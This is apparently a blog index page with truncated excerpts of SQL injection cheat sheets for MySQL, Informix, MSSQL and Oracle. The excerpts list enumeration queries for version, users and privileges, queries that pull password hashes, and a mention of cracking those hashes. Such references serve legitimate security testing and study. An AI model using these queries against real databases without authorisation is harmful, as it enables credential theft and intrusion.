Security/DB (4)

MySQL SQL Injection Cheat Sheet
Version: SELECT @@version
Comments: SELECT 1; #comment
          SELECT /*comment*/1;
Current User: SELECT user();
              SELECT system_user();
List Users: SELECT user FROM mysql.user; -- priv
List Password Hashes: SELECT host, user, password FROM mysql.user; -- priv
Password Cracker: John the Ripper will crack MySQL password hashes.
List Privileges: SELECT grantee, privilege_type, is_grantable FROM information_schema.us..
2015. 4. 14.

Informix SQL Injection Cheat Sheet
Version: SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1;
         SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1;
         SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version', 'level') FROM systables WHERE tabid = 1;
         SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; -- T=Windows, U=32 bit app on 32-b..
2015. 2. 27.

MSSQL SQL injection cheat sheet
Version: SELECT @@version
Comments: SELECT 1 -- comment
          SELECT /*comment*/1
Current User: SELECT user_name();
              SELECT system_user;
              SELECT user;
              SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List Users: SELECT name FROM master..syslogins
List Password Hashes: SELECT name, password FROM master..sysxlogins -- priv, mssql 2000;
                      SELECT name, master.dbo.fn_varbintohexstr(password) FROM master...
2014. 11. 18.

Oracle SQL Injection Cheat Sheet
Version: SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
         SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
         SELECT version FROM v$instance;
Comments: SELECT 1 FROM dual -- comment
          -- NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name 'dual' when we're not actually selecting from a table.
Current User: SELECT us..
2014. 11. 14.